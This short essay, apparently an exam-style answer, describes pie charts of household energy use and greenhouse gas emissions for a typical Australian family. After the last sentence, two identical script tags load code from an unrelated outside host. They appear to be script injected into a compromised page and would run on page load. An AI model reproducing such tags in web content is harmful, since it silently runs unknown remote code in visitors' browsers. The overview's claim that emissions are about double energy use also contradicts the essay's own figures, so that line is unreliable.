The graphs indicate the consumption of energy and the discharge of greenhouse gases due to this use in a typical Australian family.
Overall, the most energy is used for heating and warming water, and the percentage of greenhouse gas emissions is about double the percentage of energy utilized, except for heating.
Looking at the first pie chart, we can see the majority of energy consumption is spent on heating (42%), and heating water (30%), followed by the other appliances at 15%. The minimum amount of energy usage in refrigeration, lighting, and cooling is only 7%, 4%, and 2% of total energy consumption, respectively.
Regarding the greenhouse gas emissions, the two highest emitters giving off are water warming (32%) and the other appliances (28%). The refrigeration and the heating are roughly similar at between 14% and 15%. The lowest figures here are for the lighting at 8% and finally the cooling at only 3%.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
